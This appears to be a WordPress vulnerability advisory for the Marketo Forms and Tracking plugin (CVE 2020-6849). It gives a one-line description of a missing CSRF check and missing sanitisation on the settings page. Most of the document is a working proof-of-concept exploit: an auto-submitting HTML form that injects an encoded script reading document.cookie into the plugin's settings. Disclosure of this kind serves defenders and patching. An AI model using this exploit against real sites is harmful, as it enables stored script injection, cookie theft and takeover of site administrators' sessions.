Marketo Forms and Tracking <= 1.0.2 – CSRF to XSS | CVE 2020-6849

Description

Lack of CSRF checks and sanitisation on the plugin's settings page could allow XSS attacks via CSRF.

Proof of Concept

<html>
<form action="https://[WP]/wp-admin/admin.php?page=marketo_fat" method="POST" id="csrf">
    <input type="text" name="marketo_save" value="true">
    <input type="text" name="marketo[marketo_id]" value="&#x22;&#x3E;&#x3C;script&#x3E;alert(document.cookie)&#x3C;/script&#x3E;">
    <input type="text" name="marketo[marketo_base_url]" value="">
    <input type="text" name="marketo[user_id]" value="">
    <input type="text" name="marketo[end_point]" value="">
    <input type="text" name="marketo[secret]" value="">
    <input type="text" name="marketo[popout_title]" value="">
    <input type="text" name="marketo[popout_tabtext]" value="">
    <input type="text" name="marketo[popout_snippet]" value="">
    <input type="text" name="marketo[popout_form]" value="">
</form>
<script>
    document.getElementById('csrf').submit();
</script>
</html>